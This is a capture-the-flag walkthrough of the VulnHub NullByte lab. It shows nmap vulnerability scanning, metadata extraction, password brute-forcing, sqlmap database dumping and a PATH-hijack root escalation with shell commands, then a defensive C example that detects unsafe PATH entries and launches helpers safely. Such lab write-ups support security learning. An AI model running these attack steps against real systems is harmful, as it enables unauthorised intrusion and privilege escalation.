Introduction
Series: NullByte (1 unit in this series)
Release date: August 1, 2015
Difficulty: Beginner
Running environment: Virtualbox
Goal: Obtain Root permissions
Learning:
- nmap vulnerability scan script (--script=vuln)
- Brute force cracking
- SQL injection
- Environment variable privilege escalation
Target address: https://www.vulnhub.com/entry/nullbyte-1,126/
Information gathering
netdiscover host discovery
sudo netdiscover -i eth1 -r 192.168.56.0/24
Host information detection
Found that SSH is running on port 777.
nmap -p- 192.168.56.109
nmap -p 80,111,777,56412 -A 192.168.56.109
nmap -p 80,111,777,56412 --script=vuln 192.168.56.109
Website enumeration
When you open the website, you see only an image; the image address is in the page source code.
Directory brute-forcing did not turn up anything valuable, so let's take a look at the image first. A string of characters was found in its metadata.
wget http://192.168.56.109/main.gif
exiftool main.gif
After trying it, I found that this is a website directory, and it seems that a password is required to log in.
Brute force cracking
Use BurpSuite for brute force cracking. The dictionary selected is rockyou, but this dictionary is too large, so I used \SecLists-2023.1\Passwords\Leaked-Databases\rockyou-70.txt in SecLists to crack the password:
elite
SQL injection
After logging in, the search page turns out to be vulnerable to SQL injection. Checking the request shows that no cookie is needed, which makes it straightforward: just run sqlmap.
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --tables
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --columns
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --dump
This ciphertext cannot be decoded directly. After trying it, I found that it can be base64 decoded. Finally, the corresponding plaintext is: omega
SSH login
Privilege escalation
Based on the command line history, a suspicious executable file was easily found. Running it shows that it calls other programs (here ps) by name rather than by absolute path, which is what makes the PATH tampering below possible.
Method 1
Open a second terminal session and tamper with the environment variables
./procwatch
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
./procwatch
Method 2
Open a new terminal locally and modify the environment variables
echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch
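Both methods work for the same reason: a privileged binary resolves a helper command through a PATH that the unprivileged caller controls. The following is an added example, not the NullByte procwatch binary and not from the VulnHub author; it shows a hypothetical hardened launcher pattern alongside a check that flags the kind of PATH used in Method 1 (a world-writable /tmp prepended) and Method 2 (a "." entry). The function names, the fixed PATH string and the sample PATH values are assumptions made for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Hypothetical hardened launcher; not the NullByte procwatch binary.
 *
 * Vulnerable pattern (shown for contrast only, never called here):
 *     system("ps");
 * "ps" is resolved through whatever PATH the caller exported, so with
 * the SUID bit set, a planted /tmp/ps or ./ps runs with root privileges.
 */

/* Return 1 if PATH has an entry an unprivileged user could control:
 * an empty component (searched as the current directory), a relative
 * entry such as ".", or an existing directory writable by others
 * (/tmp qualifies even with the sticky bit, since anyone can drop a
 * new file there). Directories that do not exist are skipped.
 * Return 0 when every entry is an absolute, non-world-writable directory. */
int path_is_untrusted(const char *path)
{
    if (path == NULL || *path == '\0')
        return 1;
    const char *p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 1;                 /* "", "." or relative directory */
        char dir[4096];
        if (len >= sizeof dir)
            return 1;                 /* oversize entry: refuse rather than guess */
        memcpy(dir, p, len);
        dir[len] = '\0';
        struct stat st;
        if (stat(dir, &st) == 0 && S_ISDIR(st.st_mode) && (st.st_mode & S_IWOTH))
            return 1;                 /* world-writable directory, e.g. /tmp */
        if (colon == NULL)
            return 0;
        p = colon + 1;
    }
}

/* Hardened pattern: ignore the inherited environment, hand the child a
 * fixed PATH, and name the helper by absolute path only. Returns the
 * child's exit status, 127 if exec failed, or -1 for a non-absolute
 * path or a fork/wait failure. */
int run_helper_hardened(const char *abs_path)
{
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                    /* never let the caller's PATH choose the binary */
    char *const argv[] = { (char *)abs_path, NULL };
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, envp);
        _exit(127);                   /* exec failed: do not fall back to a PATH search */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample PATH values: a normal one, then the two shapes
     * used in Method 1 and Method 2 on this page. */
    const char *samples[] = {
        "/usr/local/bin:/usr/bin:/bin",
        "/tmp:/usr/local/bin:/usr/bin:/bin",
        ".:/usr/bin:/bin",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-40s -> %s\n", samples[i],
               path_is_untrusted(samples[i]) ? "UNTRUSTED" : "ok");
    printf("relative helper name rejected: %d\n", run_helper_hardened("ps"));
    return 0;
}
```

The check is a detection aid for auditing a SUID program's runtime environment; the real fix is the launcher pattern, which resets PATH and uses an absolute path so the caller's environment cannot influence which binary runs.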